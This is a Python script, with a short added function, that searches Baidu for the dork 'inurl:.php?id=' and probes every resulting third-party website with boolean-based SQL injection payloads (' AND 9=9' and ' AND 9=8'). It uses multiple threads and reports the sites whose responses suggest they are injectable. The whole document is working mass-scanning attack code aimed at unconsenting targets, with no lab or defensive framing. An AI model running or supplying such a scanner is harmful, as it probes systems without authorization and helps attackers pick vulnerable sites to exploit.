Search Baidu for a keyword, collect the result URLs from the page, and probe each one with a simple boolean-based SQL injection payload to check whether it is injectable.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2018-02-23 18:09:33
# @Author : bb (317716008@qq.com)
# @Word : python can change world!
# @Version : python3.6
import requests
from bs4 import BeautifulSoup
from threading import Thread
from queue import Queue
from time import sleep
q=Queue()
def search(wp, page):
    """Search Baidu for the dork `wp` and collect result links from result page `page`."""
    url_list = set()
    url = 'http://www.baidu.com/s?wd=' + wp + '&pn=' + str((page - 1) * 10)
    res = requests.get(url).content
    soup = BeautifulSoup(res, "html.parser")
    for i in soup.find_all('a'):
        b = i.get('href')
        try:
            # keep only Baidu redirect links of reasonable length
            if b is not None:
                if b.find('http://www.baidu.com/link?url=') != -1:
                    if len(b) < 110:
                        url_list.add(b)
        except:
            continue
    # for i in url_list:
    #     print(i, len(url_list))
    return url_list
def tranurl(url_list):
    """Follow each Baidu redirect link to resolve the real target URL and queue it."""
    for i in url_list:
        # print(i)
        try:
            r = requests.get(i)
            url = r.url
            # skip Baidu's own hot-topic pages
            if url.find('top.baidu.com') == -1:
                q.put(url)
                print('[+]', url)
        except:
            continue
def scan():
    """Pull URLs off the queue and test them with a simple boolean-based payload."""
    print('[info]Scan Thread is running')
    while 1:
        sleep(0.5)
        curl = q.get()
        payload = {'src': curl, 'bool_true': curl + ' AND 9=9', 'bool_false': curl + ' AND 9=8'}
        print('[scan]' + curl)
        try:
            r_src = requests.get(payload['src']).headers['content-length']
            r_bool_true = requests.get(payload['bool_true']).headers['content-length']
            r_bool_false = requests.get(payload['bool_false']).headers['content-length']
        except:
            continue
        # likely injectable: the TRUE condition leaves the page unchanged,
        # while the FALSE condition changes the response size
        if r_src == r_bool_true and r_bool_true != r_bool_false:
            print('[*Bigo!*]', curl)
def work(wp, page):
    """Search one result page and feed the resolved URLs to the scan queue."""
    print('[info]start search......')
    url_list = search(wp, page)
    tranurl(url_list)
if __name__ == '__main__':
    for i in range(10):  # number of scanner threads
        t = Thread(target=scan)
        t.start()
    for i in range(1, 3):  # fetch the first two Baidu result pages
        work('inurl:.php?id=', i)
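
The check above relies on the Content-Length response header, which many servers omit (for example with chunked transfer encoding), so comparing the actual body length is often more reliable. Below is a minimal sketch of the same boolean-based idea using len(r.content); the function name check_bool_sqli and the timeout parameter are my own illustration, not part of the original script:

import requests

def check_bool_sqli(url, timeout=5):
    """Rough boolean-based check: the TRUE payload should not change the page,
    while the FALSE payload should. Compares body lengths instead of the
    Content-Length header, which is not always present."""
    try:
        len_src = len(requests.get(url, timeout=timeout).content)
        len_true = len(requests.get(url + ' AND 9=9', timeout=timeout).content)
        len_false = len(requests.get(url + ' AND 9=8', timeout=timeout).content)
    except requests.RequestException:
        return False
    return len_src == len_true and len_true != len_false

# usage (hypothetical target): check_bool_sqli('http://example.com/item.php?id=1')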